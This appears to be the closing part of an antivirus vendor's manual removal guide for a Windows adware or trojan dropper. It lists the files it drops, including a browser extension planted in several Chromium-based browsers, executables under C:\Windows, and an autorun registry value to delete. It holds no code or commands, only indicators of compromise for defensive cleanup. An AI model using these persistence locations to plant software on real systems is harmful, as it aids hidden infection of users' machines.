   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-1I0SD.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jyueservice.exe (208 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-KSONF.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-HG2NG.tmp (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-CLNBN.tmp (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-O672V.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-E1EH3.tmp (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-4P1TV.tmp (3073 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\jywebHelper. (376 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-9SRI3.tmp (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-KM7R2.tmp (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\is-1CE92.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-C6MA6.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FPP5R.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-669ON.tmp (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\is-UTB4B.tmp (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-OJM14.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\xmlconfig\is-HBL2N.tmp (663 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-PMUMK.tmp (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-UGJFV.tmp (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-42QG3.tmp (4185 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-R6K8A.tmp (88 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\chromeNativeClient\is-QCFIG.tmp (412 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-R4UO6.tmp (13800 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\is-3VJA0.tmp (56 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-AMVGA.tmp (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-Q7MA6.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-HJ25S.tmp (594 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ITCRM.tmp (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-6G1GU.tmp (3361 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-8NPD8.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-QPVIT.tmp (601 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-2BM18.tmp (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-O9BG9.tmp (601 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-IEEEV.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\zh_CN\is-8BCSI.tmp (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-UNSUO.tmp (11168 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-2AIAO.tmp (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4159G.tmp (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-I5T5P.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-K372N.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-E0HRH.tmp (1281 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-AJCA6.tmp (3361 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-MBJU2.tmp (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-OMIPG.tmp\_isetup\_shfoldr.dll (47 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\chromeNativeClient\is-GF3CF.tmp (1425 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-VGUEH.tmp (2105 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-BFJBC.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\is-I1VK9.tmp (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-KTQ2I.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\xmlconfig\is-NNO2O.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-G8HVS.tmp (2321 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\is-JRQE4.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SIQ7T.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-IH47N.tmp (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\is-N6BD7.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-2SP90.tmp (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\resource\DirectUI\is-A29B6.tmp (594 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-MD2UI.tmp (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-0H4IE.tmp (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\473213\is-O0M9S.tmp (2321 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-AC6LT.tmp\src2011.tmp (1423 bytes)
   C:\Windows\kBqJzF\MIJ.exe (108 bytes)
   C:\Windows\Media\McIe.wav (17 bytes)
   C:\Windows\Media\Mcfg.wav (1 bytes)
   C:\Windows\tem.vbs (169 bytes)
   C:\Windows\kBqJzF\BPp.exe (108 bytes)
   C:\Windows\pcq.exe (108 bytes)
   C:\Windows\onest.txt (1 bytes)
   C:\Windows\kBqJzF\LiveUDHelper.dll (1 bytes)
   C:\Windows\mcconfig.dat (2 bytes)
   C:\Windows\kBqJzF\G57.exe (108 bytes)
   C:\Windows\kBqJzF\PTR.exe (108 bytes)
   C:\Windows\kBqJzF\xPiSs.exe (218 bytes)
   C:\Windows\Media\hd.wav (1 bytes)
   C:\Windows\kBqJzF\27e.exe (108 bytes)
   C:\Windows\kBqJzF\Dqc.exe (108 bytes)
   C:\Windows\kBqJzF\drH.exe (108 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{259407C2-8FA0-425C-9A68-FD1873827037}\PlayTasks\0\Play.lnk (756 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Playerâ„¢.lnk (280 bytes)
   C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
   C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarC072.tmp (2712 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabC071.tmp (51 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\src2011[1].exe (564208 bytes)
   C:\Windows\mm.exe (299 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\1819[1].exe (527707 bytes)
   C:\Windows\src2011.exe (50 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\yy[1].txt (196 bytes)
   C:\Windows\1819.exe (50 bytes)
   C:\Windows\WindowsUpdate\tqgb.exe (31632 bytes)
   C:\Windows\Report.log (7 bytes)
   C:\Windows\st.dat (75 bytes)
   C:\Windows\Media\[fafk4].mp3 (1 bytes)
   C:\Windows\star.dat (44 bytes)
   C:\Windows\webpid.txt (4 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\cupdate.dat (157 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\background.js (772 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8270 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_metadata\verified_contents.json (580 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\res\crx.png (88 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\res\crx.png (196 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\background.js (772 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (45 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\_locales\en\messages.json (294 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_create\_metadata\verified_contents.json (580 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_locales\zh_CN\messages.json (816 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
   %Program Files%\Google\Chrome\Application\54.0.2840.71\resources.pak (597622 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\res\crx.png (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\background.js (18 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\res\crx.png (196 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_remove\background.js (772 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\jychromeex_update\background.html (230 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\76b40\7zxr.dll (18123 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\jychromeex\_metadata\computed_hashes.json (40 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\78017\jyrili.exe (3589 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "tqgb.exe" = "C:\Windows\WindowsUpdate\tqgb.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.